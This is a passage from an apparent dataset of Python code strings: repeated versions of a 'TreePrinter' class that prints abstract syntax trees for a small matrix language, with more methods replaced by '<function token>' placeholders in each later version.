1)\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n\n @addToClass(UnaryMinus)\n def printTree(self, indent=0):\n print_intended('-', indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Transpose)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Program)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.instructions_opt.printTree(indent + 1)\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n\n @addToClass(Range)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.start_value.printTree(indent + 1)\n self.end_value.printTree(indent + 1)\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Block)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.instructions is not None:\n self.instructions.printTree(indent + 1)\n\n 
@addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n <function token>\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n\n @addToClass(UnaryMinus)\n def printTree(self, indent=0):\n print_intended('-', indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Transpose)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Program)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.instructions_opt.printTree(indent + 1)\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n\n @addToClass(Range)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.start_value.printTree(indent + 1)\n self.end_value.printTree(indent + 1)\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Block)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.instructions is not None:\n self.instructions.printTree(indent + 1)\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def 
printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n <function token>\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n\n @addToClass(UnaryMinus)\n def printTree(self, indent=0):\n print_intended('-', indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Transpose)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Program)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.instructions_opt.printTree(indent + 1)\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n <function token>\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n 
self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n\n @addToClass(UnaryMinus)\n def printTree(self, indent=0):\n print_intended('-', indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Transpose)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Program)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.instructions_opt.printTree(indent + 1)\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n <function token>\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n <function token>\n\n 
@addToClass(Transpose)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Program)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.instructions_opt.printTree(indent + 1)\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n <function token>\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n <function token>\n <function token>\n\n @addToClass(Program)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.instructions_opt.printTree(indent + 1)\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function 
token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n <function token>\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n <function token>\n\n @addToClass(ArrayElement)\n def 
printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n <function token>\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n <function token>\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n <function token>\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n 
<function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n <function token>\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n <function token>\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n <function token>\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in 
self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n <function token>\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n <function token>\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n <function token>\n <function token>\n\n @addToClass(Expression)\n def 
printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n <function token>\n <function token>\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n 
